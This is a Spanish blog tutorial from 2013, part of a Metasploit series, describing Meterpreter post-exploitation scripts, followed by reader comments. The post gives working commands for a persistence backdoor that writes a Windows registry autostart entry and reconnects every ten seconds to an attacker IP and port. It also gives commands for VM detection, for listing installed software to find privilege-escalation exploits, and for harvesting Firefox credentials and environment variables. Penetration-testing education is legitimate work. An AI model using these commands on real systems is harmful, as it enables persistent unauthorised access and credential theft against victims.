martes, 8 de enero de 2013

Coqueteando con Metasploit: Meterpreter IV

  Primera entrada del año y cuarta de Meterpreter. Introduciremos el comando run que permite ejecutar scripts realizados para meterpreter ampliando ya la útil y cuantiosa cantidad de posibilidades que ofrece la aplicación.

  A continuación veremos distintos de estos scripts con las mas dispares funcionalidades pero todos útiles de un modo u otro.



Persistencia

  La orden persistance (antecedida por run) permite a meterpreter anclarse al inicio del sistema e intente establecer conexiones con la máquina atacante cada X tiempo.


  El siguiente comando permite que al inicio del sistema comprometido y en intervalos de 10 segundos éste intente conectar con la máquina del atacante:
run persistance -U -p 31337 -r 192.168.0.108 -i 10
donde:

  • -U => Ejecuta meterpreter cuando la víctima accede a su sistema.
  • -p <puerto a la escucha> => El puerto del equipo del atacante en donde se conectará la víctima, es necesario que el atacante tenga un "handler" escuchando en este puerto como vimos en anteriores entregas. 
  • -r <IP atacante> => La dirección IP del atacante.
  • -i <segundos> => El intervalo en segundos en el que la víctima intentará establecer conexión con el atacante.

  Una vez ejecutado, agrega una entrada de meterpreter al registro de Windows en la sección de las aplicaciones que arrancan al inicio.

  Para probar que funciona, cerramos la sesión de meterpreter y ponemos Metasploit a escuchar el puerto especificado antes (con el handler). En breve (en función del intervalo especificado) veremos como la víctima se conecta automáticamente.




¿ Es la víctima una máquina virtual?

  El siguiente script permite saber si el sistema comprometido es o no una máquina virtual. Para ello basta con:
run checkvm



Aplicaciones en el equipo comprometido

  También de forma simple es posible ver las aplicaciones que tiene el equipo comprometido instaladas y su respectiva versión. Esto puede ser muy útil a la hora de buscar determinados exploits para, por ejemplo, escalar privilegios.
run get_application_list




Obtener las credenciales de Firefox

 Para obtener jugosa información del navegador zorruno, existe otro script para hacernos la vida mas facil. Éste se encargará de descargar a nuestro equipo los archivos necesarios para después analizarlos con comodidad.
run post/multi/gather/firefox_creds

Existen gran cantidad de scripts para obtener las credenciales e información útil de muchos programas incluso en distintas versiones de éstos. Su utilización es similar a la de Firefox, basta con buscarlos en "post/multi/gather".



Variables de entorno

  Si se requieren las variables de entorno del equipo comprometido, su obtención es tan rápida como:
run get_env




  Y con esto cerramos la primera entrada del año y relaciona con los scripts de meterpreter. Quedan un par mas relacionadas con run  y cerraremos la subsaga de meterpreter.

  Un saludo, nos leemos en breve ;).

5 0verl0ad Labs: Coqueteando con Metasploit: Meterpreter IV   Primera entrada del año y cuarta de Meterpreter. Introduciremos el comando  run  que permite ejecutar scripts realizados para meterpreter ...

3 comentarios:

milton vega dijo...

Solo un gran saludo.,
<>.,

Anónimo dijo...

Una Pregunta Aetsu, meterpreter se podria ver como un troyano? pero en base a consola, cuando genera el binario y este se ejecuta en el equipo de la victima, otra pregunta si ejecuto el binario en el equipo por primera ves, pero la victima apaga el equipo y lo enciende, yo aun no he tenido conexion con la maquina afectada para dar los parametros de RUN y persistencia se perderia la conexion, Agradezco Mucho tan valiosa informacion, Gracias por compartir tu conocimiento.

Aetsu Alpha dijo...

Desde mi punto de vista, si que puedes considerar meterpreter como un troyano pues tiene muchas funcionalidades que poseen los troyanos.

Respecto a lo otro, cuando la victima ejecute el binario con meterpreter, debes tener un metasploit escuchando en la IP que has configurado en meterpreter para recibir las conexiones. Es posible que haya otros métodos de hacerlo cuando generes el payload, pero las desconozco :(.

Un saludo.

< >